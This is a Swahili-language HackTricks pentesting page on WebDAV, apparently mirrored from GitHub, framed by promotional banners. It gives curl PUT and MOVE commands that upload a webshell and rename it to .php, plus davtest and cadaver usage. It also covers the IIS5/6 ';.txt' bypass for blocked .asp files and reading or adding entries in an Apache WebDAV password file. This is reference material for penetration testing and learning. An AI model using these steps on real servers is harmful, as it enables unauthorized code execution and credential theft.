mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-11 13:56:22 +00:00
132 lines
7.1 KiB
Markdown
132 lines
7.1 KiB
Markdown
# WebDav
|
|
|
|
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa kutumia zana za **jamii ya juu zaidi** duniani.\
|
|
Pata Ufikiaji Leo:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
|
|
Unaposhughulika na **HTTP Server yenye WebDav** imewezeshwa, ni rahisi **kudhibiti faili** ikiwa una **sifa sahihi**, kawaida huthibitishwa kupitia **Uthibitishaji wa Msingi wa HTTP**. Kupata udhibiti juu ya seva kama hiyo mara nyingi hujumuisha **kupakia na kutekeleza webshell**.
|
|
|
|
Upatikanaji wa seva ya WebDav kawaida unahitaji **sifa halali**, na [**WebDav bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) ikiwa njia ya kawaida ya kuzipata.
|
|
|
|
Ili kushinda vizuizi kwenye kupakia faili, hasa zile zinazozuia utekelezaji wa skripti za upande wa seva, unaweza:
|
|
|
|
* **Pakia** faili zenye **nyongeza za kutekelezeka** moja kwa moja ikiwa hazijazuiliwa.
|
|
* **Badilisha jina** la faili zilizopakiwa zisizo za kutekelezeka (kama .txt) kuwa nyongeza inayoweza kutekelezeka.
|
|
* **Nakili** faili zilizopakiwa zisizo za kutekelezeka, zikibadilisha nyongeza yao kuwa moja inayoweza kutekelezeka.
|
|
|
|
## DavTest
|
|
|
|
**Davtest** jaribu **kupakia faili kadhaa zenye nyongeza tofauti** na **angalia** ikiwa nyongeza ina **tekelezwa**:
|
|
```bash
|
|
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
|
|
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
|
|
```
|
|
Output sample:
|
|
|
|
![](<../../.gitbook/assets/image (851).png>)
|
|
|
|
Hii haimaanishi kwamba **.txt** na **.html extensions zinatekelezwa**. Hii inamaanisha kwamba unaweza **kufikia faili hizi** kupitia wavuti.
|
|
|
|
## Cadaver
|
|
|
|
Unaweza kutumia chombo hiki ku **kuunganisha kwenye seva ya WebDav** na kutekeleza vitendo (kama **kupakia**, **kuhamisha** au **kufuta**) **kwa mkono**.
|
|
```
|
|
cadaver <IP>
|
|
```
|
|
## Ombi la PUT
|
|
```
|
|
curl -T 'shell.txt' 'http://$ip'
|
|
```
|
|
## Ombi la KUHAMISHA
|
|
```
|
|
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
|
|
```
|
|
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia** **mchakato** kwa kutumia zana za **jamii** za **juu kabisa** duniani.\
|
|
Pata Ufikiaji Leo:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
## IIS5/6 WebDav Udhaifu
|
|
|
|
Udhaifu huu ni wa kuvutia sana. **WebDav** **haikubali** **kupakia** au **kubadilisha jina** la faili lenye kipengee **.asp**. Lakini unaweza **kupuuza** hili kwa **kuongeza** mwishoni mwa jina **";.txt"** na faili ita **tekelezwa** kana kwamba ni faili ya .asp (unaweza pia **kutumia ".html" badala ya ".txt"** lakini **USISAHAU ";"**).
|
|
|
|
Kisha unaweza **kupakia** kabati yako kama faili ya ".**txt"** na **nakili/hamisha** kwa faili ya ".asp;.txt". Ukifika kwenye faili hiyo kupitia seva ya wavuti, ita **tekelezwa** (cadaver itasema kuwa hatua ya kuhamisha haikufanya kazi, lakini ilifanya kazi).
|
|
|
|
![](<../../.gitbook/assets/image (1092).png>)
|
|
|
|
## Tuma siri
|
|
|
|
Ikiwa Webdav ilikuwa inatumia seva ya Apache unapaswa kutazama tovuti zilizowekwa katika Apache. Kawaida:\
|
|
_**/etc/apache2/sites-enabled/000-default**_
|
|
|
|
Ndani yake unaweza kupata kitu kama:
|
|
```
|
|
ServerAdmin webmaster@localhost
|
|
Alias /webdav /var/www/webdav
|
|
<Directory /var/www/webdav>
|
|
DAV On
|
|
AuthType Digest
|
|
AuthName "webdav"
|
|
AuthUserFile /etc/apache2/users.password
|
|
Require valid-user
|
|
```
|
|
Kama unavyoweza kuona kuna faili zenye **vyeti** halali kwa seva ya **webdav**:
|
|
```
|
|
/etc/apache2/users.password
|
|
```
|
|
Ndani ya aina hii ya faili utapata **jina la mtumiaji** na **hash** ya nenosiri. Hizi ni anwani za seva ya webdav inayotumia kuthibitisha watumiaji.
|
|
|
|
Unaweza kujaribu **kuzivunja**, au **kuongeza zaidi** ikiwa kwa sababu fulani unataka **kupata** seva ya **webdav**:
|
|
```bash
|
|
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
|
|
```
|
|
Kuchunguza ikiwa sifa mpya za kibali zinafanya kazi unaweza kufanya:
|
|
```bash
|
|
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
|
|
```
|
|
## Marejeo
|
|
|
|
* [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
|
|
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii za **juu zaidi** duniani.\
|
|
Pata Ufikiaji Leo:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|